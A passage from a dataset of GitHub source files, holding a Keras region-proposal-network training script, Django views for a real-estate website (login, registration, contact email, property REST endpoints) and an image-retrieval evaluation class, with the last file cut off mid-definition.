self.makeOutput()\n\n def makeOutput(self):\n for test in range(self.numOfTests):\n self.fOut.write(\"Case #%d: %s\\n\" % (test + 1, self.results[test]))\n self.fIn.close()\n self.fOut.close()\n \nif __name__ == '__main__':\n solver = Solver()\n if parallelSolve:\n solver.parallel()\n else:\n solver.sequential()\n \n","repo_name":"yubinbai/pcuva-problems","sub_path":"UVa 661 - Blowing Fuses/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"48"} +{"seq_id":"69980657426","text":"import os\nimport sys\nimport PIL\nimport pickle\nimport json\nimport numpy as np\nfrom tqdm import tqdm\nfrom math import log, exp\nfrom random import shuffle\nfrom skimage.transform import resize\nfrom IPython.display import Image, display\nfrom PIL import ImageEnhance, ImageFont, ImageDraw\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.python.keras.utils.data_utils import Sequence\nfrom tensorflow.keras.layers import Layer\n\n\nimport img_aug\nimport data_gen\nfrom data_gen import create_ytrue_train, generate_anchor_boxes, preprocess_anchor_boxes\n\ndef get_val_data(pickle_file, json_file):\n with open(pickle_file, 'rb') as f:\n imgs_dict = pickle.load(f)\n data_dict = {}\n for imgid in imgs_dict:\n data_dict[imgid] = []\n with open(json_file, 'r') as f:\n annotations_dict = json.load(f)\n annotations_list = annotations_dict['annotations']\n for annotation in annotations_list:\n try:\n img_id = annotation['image_id']\n imwidth = imgs_dict[img_id][1]\n imheight = imgs_dict[img_id][2]\n c = annotation['category_id'] # TODO: make sure that category ids start from 1, not 0. Need to set back_ground as another category\n boxleft,boxtop,boxwidth,boxheight = annotation['bbox']\n box_cenx = boxleft + boxwidth/2.\n box_ceny = boxtop + boxheight/2.\n x,y,w,h = box_cenx/imwidth, box_ceny/imheight, boxwidth/imwidth, boxheight/imheight\n data_dict[img_id].append( [c,x,y,w,h] )\n except KeyError:\n continue\n anchor_boxes = generate_anchor_boxes(480,480,16,scale = [64,128,256], no_exceed_bound = True)\n x, y = [], []\n for img_id, labels in data_dict.items():\n x.append( imgs_dict[img_id][0])\n y.append( create_ytrue_train( imgs_dict[img_id][0], np.array(labels),anchor_boxes, iou_upper=0.7, iou_lower = 0.3 ))\n return np.array(x), np.array(y)\n\ndef rpn_regr_loss(ytrue, ypred):\n #y_labels are in the shape [bs, i*j*9, 6]\n mask = tf.where(ytrue != 0, 1., 0.)\n ypred = tf.math.multiply(mask,ypred)\n return keras.losses.Huber()(ytrue,ypred)\n\ndef rpn_class_loss(ytrue, ypred):\n cl = tf.reduce_all(ytrue == 0, axis = 2)\n cl2 = tf.stack((cl,cl), axis=-1)\n ypred = tf.where(cl2, 0., ypred)\n return keras.losses.BinaryCrossentropy()(ytrue, ypred)\n\nimg_pickle = r'D:\\Til data\\images.p'\n#val_img_pickle = r'/content/images_val.p'\n#save_model_folder = r'/content/'\njson_annotation = r'D:\\Til data\\train.json'\n#val_annotation = r'/content/val.json'\nbs = 16\nn_epochs_warmup = 100\nn_epochs_after = 100\n#train_x, train_y = get_val_data(img_pickle, json_annotation)\n#print(train_x.shape)\n#print(train_y.shape)\ninput_shape = (480,480,3)\n#save_model_path = os.path.join( save_model_folder, 'rpn_model.h5' )\n\n#Transfers VGG16 layer until last convolutional layer\n#model = tf.keras.applications.VGG19(include_top = False, input_shape = (480,480,3))\n\n#model_2 = tf.keras.models.Sequential(name=\"VGG16\")\n#for layer in model.layers[:-1]:\n# 
model_2.add(layer)\n#for layer in model_2.layers:\n# layer.trainable = False\n\n#inputs = keras.Input(shape = input_shape)\n#x = model_2(inputs)\n#x = layers.Conv2D(512, 3, padding=\"same\")(x)\n#object_classification = layers.Conv2D(18, 1, padding=\"same\")(x)\n#object_classification = layers.Reshape((8100, 2))(object_classification)\n#object_classification = layers.Softmax(axis=-1, name=\"c\")(object_classification)\n#bbox_regression = layers.Conv2D(36, 1, padding=\"same\")(x)\n#bbox_regression = layers.Reshape((8100,4), name=\"r\")(bbox_regression)\n#rpn = keras.Model(inputs, outputs=[object_classification, bbox_regression], name=\"test_model\")\n#rpn.compile(optimizer=tf.keras.optimizers.Adam(0.001),\n# loss={\"c\":rpn_class_loss, \"r\":rpn_regr_loss},\n# loss_weights={\"c\" : 1./256, \"r\" : 4*1./900},\n# metrics=[tf.keras.metrics.RootMeanSquaredError()])\n\n#rpn.summary()\n\n#model_plot = tf.keras.utils.plot_model(rpn, to_file =\"d:\\\\programming\\\\python\\\\dsta cv\\\\model3.png\",show_shapes=True)\n#model_img_f = \"d:\\\\programming\\\\python\\\\dsta cv\\\\model.png\"\n#keras.utils.plot_model(model, to_file=model_img_f, show_shapes=True)\n\n#TRAINING\n#file_path = r\"D:\\Til data\\rpn_model.h5\"\n#rpn = tf.keras.models.load_model(file_path, custom_objects={'custom_loss':custom_loss})\n#for layer in rpn.layers:\n# layer.trainable = True\n#rpn.compile(optimizer=tf.keras.optimizers.Adam(0.0001),\n# loss=custom_loss,\n# metrics=[tf.keras.metrics.RootMeanSquaredError()])\n\n#rpn.summary()\n\n#val_x, val_y = get_val_data(img_pickle, json_annotation)\n#print(val_x.shape)\n#print(val_y.shape)\n#with open(r\"D:\\Til data\\rpn_train_x.p\", \"wb\") as f:\n# pickle.dump(val_x,f)\n\n#with open(r\"D:\\Til data\\rpn_train_y.p\", \"wb\") as f:\n# pickle.dump(val_y,f)\n\n\n\n\nwith open(r\"D:\\Til data\\rpn_train_x.p\", \"rb\") as f:\n val_x = pickle.load(f)\n\nwith open(r\"D:\\Til data\\rpn_train_y.p\", \"rb\") as f:\n val_y = pickle.load(f)\n\nclass_y = val_y[:,:,:2]\nregr_y = val_y[:,:,2:]\n\nmodel_checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(\n filepath=r\"D:\\Til data\\rpn\\rpn_best.h5\",\n save_weights_only=False,\n monitor='val_loss',\n mode='auto',\n save_best_only=True)\nearlystopping = tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=15)\nreduce_lr = tf.keras.callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.2, patience=7, min_lr=1e-8)\n\n\n\nrpn.fit(x=val_x,\n y={\"c\" : class_y, \"r\" : regr_y},\n batch_size=1,\n epochs=n_epochs_warmup, \n validation_split = 0.2,\n callbacks=[earlystopping, model_checkpoint_callback, reduce_lr],\n verbose = 1)\n\ndel rpn\nrpn = tf.keras.models.load_model(r\"D:\\Til data\\rpn\\rpn_best.h5\", custom_objects = {\"rpn_class_loss\":rpn_class_loss,\"rpn_regr_loss\":rpn_regr_loss})\nfor layer in rpn.get_layer('VGG16').layers:\n layer.trainable = True\nrpn.summary()\n\nrpn.compile(optimizer=tf.keras.optimizers.Adam(0.00001),\n loss={\"c\":rpn_class_loss, \"r\":rpn_regr_loss},\n loss_weights={\"c\" : 1./256, \"r\" : 4*1./900},\n metrics=[tf.keras.metrics.RootMeanSquaredError()])\n\nmodel_checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(\n filepath=r\"D:\\Til data\\rpn\\rpn_finetuned_best.h5\",\n save_weights_only=False,\n monitor='val_loss',\n mode='auto',\n save_best_only=True)\nearlystopping = tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=15)\nreduce_lr = tf.keras.callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.2, patience=7, min_lr=1e-8)\n\nrpn.fit(x=val_x,\n y={\"c\" : class_y, \"r\" : 
regr_y}, \n batch_size=4,\n epochs=50, \n validation_split = 0.2,\n callbacks=[earlystopping, model_checkpoint_callback, reduce_lr],\n verbose = 1)\n\n\nrpn.save(r\"D:\\Til data\\rpn\\rpn_final.h5\")","repo_name":"clyveycui/TIL2020-CV-","sub_path":"CV Learning/CV Learning/rpn_training.py","file_name":"rpn_training.py","file_ext":"py","file_size_in_byte":7443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32648983160","text":"from django.http import BadHeaderError, HttpResponse, HttpResponseRedirect,FileResponse, JsonResponse #fileresponse for pdf return\nfrom django.shortcuts import redirect, render, HttpResponse\n##from justestate.settings import BASE_DIR\nfrom property.models import Property\nfrom broker.models import Broker\nfrom enquiry.models import Enquiry\nfrom contact.models import Contact\nfrom pages.serializers import PropertySerializer\nfrom rest_framework.generics import ListAPIView, CreateAPIView, RetrieveAPIView, UpdateAPIView, DestroyAPIView, ListCreateAPIView, RetrieveUpdateAPIView, RetrieveDestroyAPIView,RetrieveUpdateDestroyAPIView\n\nfrom django.contrib.auth.models import User\nfrom django.conf import settings\nfrom django.contrib.auth import login,authenticate,logout\nfrom django.core.mail import send_mail,EmailMessage\nfrom landestate.forms import RegistrationForm,ContactForm\nfrom django.core.files.storage import FileSystemStorage\nfrom django.contrib import messages\n\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import Group\n\n#filters\nfrom pages.filters import PropertyFilter\n\nimport base64\n\n#from pages.serializer import PropertySerializer\n# decorators\nfrom pages.decorators import allowed_users, unauthenticateduser,loginfirst\n# for pagination #not in use pagination is done manually\nfrom django.core.paginator import Paginator\n\nimport math\nimport time\n\n#razorpay import\n\nfrom django.views.decorators.csrf import csrf_exempt\n\n#filter and index page\ndef index(request):\n user_visits=request.session.get('user_visits', 0)\n print(user_visits)\n request.session['user_visits'] = user_visits + 1\n #print(request.session['_auth_user_id'])\n #request.session.clear()\n #request.session.flush()\n #print(request.session.items())\n #print(dir(request.session))\n \n \n \n property_list=Property.objects.all().order_by('-id')[0:6:1]\n property_filter=PropertyFilter()\n context={\"property_filter\":property_filter,\"property_list\":property_list}\n if request.method==\"POST\":\n property_list=Property.objects.all()\n\n property_filter=PropertyFilter(request.POST,queryset=property_list)\n property_list=property_filter.qs\n\n paginator = Paginator(property_list, 4) \n page_number = request.GET.get('page')\n property_list = paginator.get_page(page_number)\n context={\n \"property_filter\": property_filter,\n \"property_list\": property_list,\n \n }\n return render(request,\"pages/properties.html\",context)\n\n \n return render(request,\"pages/index.html\",context)\n\n\ndef about_us(request):\n return render(request,\"pages/about_us.html\")\n#property detials dashboar\n\n@loginfirst\n@allowed_users(allowed_roles=['admin'])\ndef user_details(request):\n\n ##Django pagination is good but doesnt work well with AJAX soo....applying manual pagination\n # paginator=Paginator(users_list,10) #show 10 users per page\n # page_number=request.GET.get(\"page\") #anchor tag href value from html page, get its value to get 
page number\n # users = paginator.get_page(page_number)\n page_number=1\n # when page is loaded page value is not given so we need to manually assign page number to avoid type error\n if request.GET.get(\"page\") is None:\n page_number=1\n print(\"page is NONE\")\n else:\n page_number=int(request.GET.get(\"page\"))\n print(\"page is available\")\n\n print(\"page_number\", page_number)\n # this line so when page value exceeds it converts it to last page value\n last_page_number=int(math.ceil(len(User.objects.all())/10))\n if page_number > last_page_number:\n page_number=last_page_number\n\n #print(\"page_number===\",page_number)\n #pagination math for slicing object set\n print(page_number)\n if page_number is None:\n users = User.objects.all()[0:10:1]\n else:\n for i in range(1,page_number+1):\n if(i==page_number):\n global start_list\n global end_list\n \n start_list=(page_number * 10)-10\n end_list=page_number * 10\n \n print(start_list)\n print(end_list)\n\n users = User.objects.all()[start_list:end_list:1]\n \n # print(users)\n # print(type(users))\n \n form=RegistrationForm()\n \n context={\"users\":users,\"form\":form,\"page_number\":page_number,\"last_page_number\":last_page_number}\n return render(request,\"pages/user_details.html\",context)\n\n#display the list of properties for user or any viewer\n#goes to properties html\ndef property_list_display(request):\n property_list = Property.objects.all().order_by('-id')\n paginator = Paginator(property_list, 2) \n\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n \n context={'page_obj':page_obj}\n return render(request,\"pages/properties.html\",context)\n\n#displaying the all details of single property\ndef property_details(request,slug):\n property_details= Property.objects.get(slug=slug)\n print(property_details)\n context={\"property_details\":property_details}\n return render(request, \"pages/property_details.html\",context)\n\n#User registration # add user through registration page\n@unauthenticateduser\ndef registration(request): \n form=RegistrationForm()\n print(vars(form))\n context={}\n if request.method==\"POST\":\n \n #create form object\n form=RegistrationForm(request.POST) \n print(vars(form))\n for field in form:\n print(\"Field Error:\", field.name, field.errors)\n print(form.is_valid())\n if form.is_valid(): \n print(\"form is valid\")\n user=form.save()\n username=form.cleaned_data.get(\"username\")\n #assign user to a group # you will see this commented code in signals \n # group= Group.objects.get(name=\"usergroup\")\n \n # user.groups.add(group)\n messages.success(request,\"User registered successful: \"+username)\n return HttpResponseRedirect('/user_login/')\n else:\n form_err=form.errors\n context={\"form_err\":form_err,\"form\":form}\n return render(request,\"pages/registration.html\",context)\n \n \n context['form']= form\n \n return render(request,\"pages/registration.html\",context)\n\n#user login\n@unauthenticateduser\ndef user_login(request):\n\n if request.method==\"POST\":\n name=request.POST[\"Name\"]\n password=request.POST[\"Password\"]\n\n user=authenticate(request,username=name,password=password)\n\n if user is not None:\n login(request,user)\n return redirect(\"/\")\n else:\n messages.info(request,\"Wrong Credentials\")\n return redirect(\"/user_login\")\n return render(request,\"pages/login.html\")\n\n@loginfirst\ndef user_logout(request):\n logout(request)\n return redirect(\"/user_login\")\n\n#for contacts and mail send\n\ndef contact(request):\n 
form=ContactForm()\n context={}\n if request.method==\"POST\":\n \n #create form object\n form=ContactForm(request.POST) \n \n \n if form.is_valid():\n print(\"form is valid\")\n form.save()\n \n \n #sending mail to manager\n name=form.cleaned_data[\"name\"]\n email=form.cleaned_data[\"email\"]\n subject=form.cleaned_data[\"subject\"]\n message=form.cleaned_data[\"message\"]\n phone=form.cleaned_data[\"phone\"]\n message=name+\" has shown interest in your property and left a note:\\n\\n\"+message+\"\\nEmail : \"+email+\"\\nPhone Number : \"+phone\n \n\n #get file to save in filestoragesystem for it to send through email\n # filetostorage=request.FILES['files']\n # print(filetostorage)\n # fs=FileSystemStorage()\n # filename=fs.save(filetostorage.name,filetostorage)\n # #get urls\n # filenameurl=fs.url(filename)\n # print(filenameurl)\n \n #Use Gmail's app password by turning 2step verification ON.\n #Then generate new app password.use that pass as USER_HOST_PASSWORD \n email_from=settings.EMAIL_HOST_USER\n email_to=\"sachin.esenceweb@gmail.com\"\n \n #create email object\n email_message= EmailMessage(subject, message, email_from, [email_to])\n \n # email_message.attach(filename,filenameurl)\n # fs.delete(filename)\n \n try:\n #send email\n email_message.send(fail_silently=False)\n messages.success(request,\"Thanks for your Interest, We will contact you soon\")\n\n except BadHeaderError:\n return HttpResponse('Invalid header found.')\n\n return HttpResponseRedirect('/')\n \n \n context['form']= form\n return render(request,\"pages/contact.html\",context)\n \n#property enquiry (new) \ndef property_enquiry(request):\n if request.method==\"POST\":\n print(\"adding enquiry property to database\")\n name=request.POST[\"prop_enq_username\"]\n email=request.POST[\"prop_enq_useremail\"]\n phone=request.POST[\"prop_enq_userphone\"]\n enquired_property=request.POST[\"enquired_property\"]\n\n enquiryinstance=Enquiry(visitor_name=name, visitor_email=email, visitor_phone=phone)\n enquiryinstance.property_enquired_id=enquired_property\n enquiryinstance.save()\n\n email_from=settings.EMAIL_HOST_USER\n email_to=\"sachin.esenceweb@gmail.com\"\n message=name+\" made an enquiry about \"+enquiryinstance.property_enquired.title+\"\\nEmail : \"+email +\"\\nPhone : \"+ phone\n\n email_message= EmailMessage(\"About User enquiry for Property\",message, email_from, [email_to,email])\n try:\n #send email\n email_message.send(fail_silently=False)\n except BadHeaderError:\n return HttpResponse('Invalid header found.')\n\n messages.success(request,\"Thanks for your Interest, We will contact you soon\")\n return HttpResponseRedirect('/')\n else:\n return HttpResponseRedirect('/property_details')\n\nclass PropertyList(ListAPIView):\n queryset= Property.objects.all()\n serializer_class = PropertySerializer\n\nclass PropertyCreate(CreateAPIView):\n queryset= Property.objects.all()\n serializer_class = PropertySerializer\n\nclass PropertyRetrieve(RetrieveAPIView):\n queryset= Property.objects.all()\n serializer_class = PropertySerializer\n\nclass PropertyUpdate(UpdateAPIView):\n queryset= Property.objects.all()\n serializer_class = PropertySerializer\n\nclass PropertyDestroy(DestroyAPIView):\n queryset= Property.objects.all()\n serializer_class = PropertySerializer\n\nclass PropertyListCreate(ListCreateAPIView):\n queryset= Property.objects.all()\n serializer_class = PropertySerializer\n\nclass PropertyRetrieveUpdate(RetrieveUpdateAPIView):\n queryset= Property.objects.all()\n serializer_class = PropertySerializer\n\nclass 
PropertyRetrieveDestroy(RetrieveDestroyAPIView):\n queryset= Property.objects.all()\n serializer_class = PropertySerializer\n\nclass PropertyRetrieveUpdateDestroy(RetrieveUpdateDestroyAPIView):\n queryset= Property.objects.all()\n serializer_class = PropertySerializer","repo_name":"sachin30/landestate","sub_path":"pages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4075006842","text":"\"\"\"Eval CBIR.\nAuthor: gongyou.zyq\nDate: 2020.11.25\n\"\"\"\n\nimport os\nimport pickle\nimport shutil\nimport time\n\nimport cv2\nimport numpy as np\n\n\nclass CBIREvaluator():\n \"\"\"CBIR Evaluator.\"\"\"\n\n def __init__(self):\n self.query_instance_dic = pickle.load(open('GLDv2_search_label_competition_2021.pkl', 'rb'))\n self.selected_test_id = list(self.query_instance_dic.keys())\n self.result_dic = self.init_result_dic()\n self.search_dir = '../input/landmark-retrieval-2021/index/'\n self.query_dir = '../input/landmark-retrieval-2021/test/'\n self.VERBOSE = False\n self.MAP_METRIC = 'retrieval'\n self.VIS_FLAG = False\n self.VIS_TOPK = 20\n self.RANK_GLOBAL_TOPK = [1, 5, 10, 20, 100]\n\n @staticmethod\n def init_result_dic():\n \"\"\"Set empty dic to cache results.\"\"\"\n\n result_dic = {'gt_num_list': [], 'best_recall_list': [],\n 'upper_bound_list': [], 'best_thr_list': [],\n 'proposal_recall_list': [], 'pred_num_list': [],\n 'cmc_list': [], 'ap_list': [],\n 'prec_list': [], 'rec_list': [],\n 'out_prec_list': [], 'out_rec_list': []}\n return result_dic\n\n def output_final_result(self):\n \"\"\"Output final result.\"\"\"\n\n mean_largest_recall = np.mean(self.result_dic['best_recall_list'])\n mean_bound = np.mean(self.result_dic['upper_bound_list'])\n mean_thr = np.mean(self.result_dic['best_thr_list'])\n mean_gt_num = np.mean(self.result_dic['gt_num_list'])\n mean_ap = np.mean(self.result_dic['ap_list'])\n mean_proposal_recall = np.mean(self.result_dic['proposal_recall_list'],\n axis=0)\n mean_pred_num = np.mean(self.result_dic['pred_num_list'])\n # np.save('./tests/localizer/average_recall_%s' % \\\n # self._cfg.EVAL.SIM_MODE, mean_topk_recall)\n mean_cmc = np.mean(self.result_dic['cmc_list'], axis=0)\n mean_prec = np.mean(self.result_dic['out_prec_list'], axis=0)\n mean_rec = np.mean(self.result_dic['out_rec_list'], axis=0)\n mean_cmc = np.round(mean_cmc, 4)\n mean_prec = np.round(mean_prec, 4)\n mean_rec = np.round(mean_rec, 4)\n sim_mode = self.MAP_METRIC\n cmc_list = self.result_dic['cmc_list']\n print(f'----------Final Results for sim_mode: {sim_mode}------------')\n print(f'Total valid query num: {len(cmc_list)}')\n print('detection metric: ')\n print(f'average_gt_num: {mean_gt_num:.1f}, '\n f'average pred num: {mean_pred_num:.1f} '\n f'largest recall: {mean_largest_recall:.4f}, '\n f' average upper bound: {mean_bound:.1f}, '\n f'mean_thr: {mean_thr:.4f}')\n print(f'ranking metric for global {self.RANK_GLOBAL_TOPK}: ')\n print(f'CMC: {mean_cmc}, mAP: {mean_ap:.4f}')\n print(f'mean precision: {mean_prec}, mean recall: {mean_rec}')\n\n def log_info(self, info_str):\n \"\"\"Log verbose info.\"\"\"\n\n if self.VERBOSE:\n print(info_str)\n\n # pylint:disable=too-many-locals\n def eval_data(self, all_reid_info):\n \"\"\"Eval data.\"\"\"\n\n start_time = time.time()\n for query_instance_id in self.selected_test_id:\n self.log_info('----------eval query_instance_id: '\n f'{query_instance_id}----------')\n if len(self.query_instance_dic[query_instance_id]) 
== 0:\n self.log_info('invalid query, skip eval this query')\n continue\n\n gt_info = self.load_gt_info(query_instance_id)\n gt_num = gt_info['gt_num']\n self.result_dic['gt_num_list'].append(gt_num)\n if gt_num == 0:\n self.log_info('gt_num=0, skip eval this query')\n continue\n pred_info = self.postprocess_pred_info(query_instance_id,\n all_reid_info)\n res = self.get_matching_flag(gt_info, pred_info)\n [tp_flag, fp_flag, thrs, gt_matched_flag, valid_flag] = res\n rec, prec = self.get_pr(tp_flag, fp_flag, gt_num)\n if len(rec) == 0:\n print('empty pred, put all zeros')\n rec = np.array([0.0])\n prec, thrs, tp_flag = rec.copy(), rec.copy(), rec.copy()\n pad_lenth = 100\n if len(rec) < pad_lenth:\n # print('pad data')\n rec = np.pad(rec, (0, pad_lenth-len(rec)), 'edge')\n prec = np.pad(prec, (0, pad_lenth-len(prec)))\n thrs = np.pad(thrs, (0, pad_lenth-len(thrs)))\n tp_flag = np.pad(tp_flag, (0, pad_lenth-len(tp_flag)))\n unmatched_data_list = self.get_unmatched(query_instance_id,\n gt_matched_flag)\n self.get_det_eval(rec, prec, thrs)\n self.get_rank_eval(rec, prec, tp_flag, gt_num)\n if self.VERBOSE:\n self.output_current_result(query_instance_id, tp_flag,\n valid_flag)\n\n if self.VIS_FLAG:\n trimmed_pred = [tp_flag, pred_info, valid_flag]\n self.vis_retrieval(query_instance_id, unmatched_data_list,\n trimmed_pred)\n print(f'{time.time() - start_time:.4f} seconds to eval all data')\n\n def output_current_result(self, query_instance_id, tp_flag, valid_flag):\n \"\"\"Output current result.\"\"\"\n\n matched_tp_index = np.argwhere(tp_flag > 0).flatten()\n print(f'matched tp index: {matched_tp_index}')\n sim_mode = self.MAP_METRIC\n best_recall = round(self.result_dic['best_recall_list'][-1], 4)\n upper_bound = round(self.result_dic['upper_bound_list'][-1], 4)\n best_thr = round(self.result_dic['best_thr_list'][-1], 4)\n gt_num = self.result_dic['gt_num_list'][-1]\n proposal_recall = self.result_dic['proposal_recall_list'][-1]\n cmc = self.result_dic['cmc_list'][-1]\n average_precision = self.result_dic['ap_list'][-1]\n out_prec = self.result_dic['out_prec_list'][-1]\n out_rec = self.result_dic['out_rec_list'][-1]\n print(f'sim_mode: {sim_mode}, data_shape: {valid_flag.shape}')\n print(f'best recall: {best_recall}, upper bound: {upper_bound}, '\n f'thr: {best_thr}, gt_num: {gt_num}, '\n f'proposal recall: {proposal_recall:.4f}')\n print(f'CMC: {cmc}, AP: {average_precision}')\n print(f'precision: {out_prec}, recall: {out_rec}')\n\n def load_gt_info(self, query_instance_id):\n \"\"\"Load gt.\"\"\"\n\n query_bbox_dic = self.query_instance_dic[query_instance_id]\n gt_bbox_dic = {}\n gt_matched_flag = {}\n gt_num = 0\n # query image should always be ignored whatever separate camera or not\n ignore_list = [query_bbox_dic['image_name']]\n\n gt_data_list = query_bbox_dic['pos_gallery_list']\n separate_cam = False\n for gt_data in gt_data_list:\n device_id = gt_data['device_id']\n image_name = gt_data['image_name']\n gt_bbox_dic[image_name] = gt_data['bbox']\n\n if gt_data['ignore']:\n ignore_list.append(image_name)\n if separate_cam and device_id != query_bbox_dic['device_id'] \\\n and not gt_data['ignore']:\n gt_num += 1\n gt_matched_flag[image_name] = 0\n if not separate_cam and not gt_data['ignore'] and\\\n image_name != query_bbox_dic['image_name']:\n gt_num += 1\n gt_matched_flag[image_name] = 0\n if image_name == query_bbox_dic['image_name']:\n ignore_list.append(image_name)\n if separate_cam and device_id == query_bbox_dic['device_id']:\n ignore_list.append(image_name)\n gt_info = 
{'gt_num': gt_num, 'gt_bbox_dic': gt_bbox_dic,\n 'gt_matched_flag': gt_matched_flag,\n 'ignore_list': ignore_list}\n return gt_info\n\n\n def load_local_proposal(self, loc_gallery_bbox_dic):\n \"\"\"Keep topk per large image for eval localizer.\"\"\"\n\n merged_bboxes = []\n merged_sims = []\n unique_image_ids = []\n repeat_times = []\n keep_num = 1\n for image_name, loc_pred_for_large in loc_gallery_bbox_dic.items():\n loc_pred_for_large = loc_gallery_bbox_dic[image_name]\n if len(loc_pred_for_large['sim']) == 0:\n continue\n indexes = np.argsort(-loc_pred_for_large['sim'])[:keep_num]\n merged_bboxes.append(loc_pred_for_large['bbox'][indexes])\n merged_sims.append(loc_pred_for_large['sim'][indexes])\n repeat_times.append(len(indexes))\n unique_image_ids.append(image_name)\n merged_bboxes = np.concatenate(merged_bboxes)\n merged_sims = np.concatenate(merged_sims)\n image_ids = np.repeat(unique_image_ids, repeat_times)\n return {'sim': merged_sims,\n 'bbox': merged_bboxes,\n 'image_name': image_ids}\n\n def postprocess_pred_info(self, query_instance_id, all_reid_info):\n \"\"\"Postprocess pred info (How to modify proposal).\"\"\"\n\n pred_dic = all_reid_info[query_instance_id]\n pred_dic = self.load_local_proposal(pred_dic)\n pred_info = self.re_sort(pred_dic)\n return pred_info\n\n def re_sort(self, pred_dic):\n \"\"\"Resort data.\"\"\"\n\n # Ref: https://zhuanlan.zhihu.com/p/37910324\n pred_sim = pred_dic['sim']\n pred_bboxes = np.array(pred_dic['bbox'])\n image_ids = np.array(pred_dic['image_name'])\n\n sorted_ind = np.argsort(-pred_sim)\n sorted_sim = pred_sim[sorted_ind]\n pred_bboxes = pred_bboxes[sorted_ind, :]\n # image_ids = [image_ids[x] for x in sorted_ind]\n image_ids = image_ids[sorted_ind]\n pred_info = {'pred_bboxes': pred_bboxes, 'image_ids': image_ids,\n 'sorted_sim': sorted_sim}\n self.result_dic['pred_num_list'].append(len(pred_bboxes))\n return pred_info\n\n\n @staticmethod\n def get_pr(tp_flag, fp_flag, gt_num):\n \"\"\"Get pr.\"\"\"\n\n fp_flag = np.cumsum(fp_flag)\n tp_flag = np.cumsum(tp_flag)\n # if len(tp_flag) == 0:\n # return 0.0, 0.0\n rec = tp_flag / float(gt_num)\n # avoid divide by zero in case the first detection matches\n # a difficult ground truth\n prec = tp_flag / np.maximum(tp_flag+fp_flag, np.finfo(np.float64).eps)\n # print(rec[:20])\n # print(prec[:20])\n return rec, prec\n\n def get_det_eval(self, rec, prec, thrs):\n \"\"\"Get det eval\"\"\"\n\n rank_index = np.arange(1, len(rec)+1)\n best_recall = np.max(rec)\n upper_bound = np.min(rank_index[rec == best_recall])\n best_thr = thrs[upper_bound-1]\n proposal_recall = rec[-1]\n\n out_rec, out_prec = self.refine_pr(rec, prec)\n self.result_dic['best_recall_list'].append(best_recall)\n self.result_dic['upper_bound_list'].append(upper_bound)\n # Clip data for speed purpose\n self.result_dic['best_thr_list'].append(best_thr)\n self.result_dic['proposal_recall_list'].append(proposal_recall)\n self.result_dic['out_rec_list'].append(out_rec)\n self.result_dic['out_prec_list'].append(out_prec)\n self.result_dic['rec_list'].append(rec)\n self.result_dic['prec_list'].append(prec)\n\n def get_rank_eval(self, rec, prec, tp_flag, gt_num):\n \"\"\"Get rank eval\"\"\"\n\n # NOTE: will clip ranklist by RANK_GLOBAL_TOPK\n if self.MAP_METRIC == 'delg':\n average_precision = self.delg_ap(tp_flag, gt_num)\n elif self.MAP_METRIC == 'voc':\n average_precision = self.voc_ap(rec, prec)\n elif self.MAP_METRIC == 'retrieval':\n average_precision = self.retrieval_ap(tp_flag, gt_num)\n else:\n print('Unknown ranking evaluation 
metric')\n return\n global_top_k = np.array(self.RANK_GLOBAL_TOPK) - 1\n max_eval_rank = self.RANK_GLOBAL_TOPK[-1]\n tp_flag = np.cumsum(tp_flag)\n if len(tp_flag) >= max_eval_rank:\n cmc = (tp_flag[:max_eval_rank] > 0).astype('int')\n cmc = cmc[global_top_k].astype('float32')\n self.result_dic['cmc_list'].append(cmc)\n self.result_dic['ap_list'].append(average_precision)\n else:\n print('too few predictions for ranking evaluation')\n\n def refine_pr(self, rec, prec):\n \"\"\"Refine pr.\"\"\"\n\n global_top_k = np.array(self.RANK_GLOBAL_TOPK) - 1\n out_rec = rec[global_top_k].astype('float32')\n out_prec = prec[global_top_k].astype('float32')\n # when compute for mAP, we use real precision and recall.\n # When compute for precision@K and recall@K, we foloow delg.\n # If `desired_pr_rank` is larger than last positive's rank,only compute\n # precision with respect to last positive's position.\n\n # pylint: disable=line-too-long\n # See https://github.com/tensorflow/models/blob/master/research/delf/delf/python/detect_to_retrieve/dataset.py for ComputePRAtRanks # noqa\n finish_indexes = np.argwhere(rec == 1.0).flatten()\n if len(finish_indexes) > 0:\n first_finish_index = finish_indexes.min()\n if first_finish_index <= global_top_k[1]:\n out_prec[1] = prec[first_finish_index]\n out_prec[2] = prec[first_finish_index]\n out_prec[3] = prec[first_finish_index]\n if global_top_k[1] < first_finish_index <= global_top_k[2]:\n out_prec[2] = prec[first_finish_index]\n out_prec[3] = prec[first_finish_index]\n if global_top_k[2] < first_finish_index <= global_top_k[3]:\n out_prec[3] = prec[first_finish_index]\n return out_rec, out_prec\n\n @staticmethod\n def voc_ap(rec, prec, use_07_metric=False):\n \"\"\"Compute VOC AP given precision and recall. If use_07_metric is true,\n uses the VOC 07 11-point method (default:False).\n \"\"\"\n\n # pylint: disable=invalid-name\n if use_07_metric:\n ap = 0.\n for t in np.arange(0., 1.1, 0.1):\n if np.sum(rec >= t) == 0:\n p = 0\n else:\n p = np.max(prec[rec >= t])\n ap = ap + p / 11.\n else:\n # correct AP calculation\n # first append sentinel values at the end\n mrec = np.concatenate(([0.], rec, [1.]))\n mpre = np.concatenate(([0.], prec, [0.]))\n\n # compute the precision\n for i in range(mpre.size - 1, 0, -1):\n mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])\n\n # to calculate area under PR curve, look for points\n # where X axis (recall) changes value\n i = np.where(mrec[1:] != mrec[:-1])[0]\n\n # and sum (\\Delta recall) * prec\n ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])\n return ap\n\n @staticmethod\n def 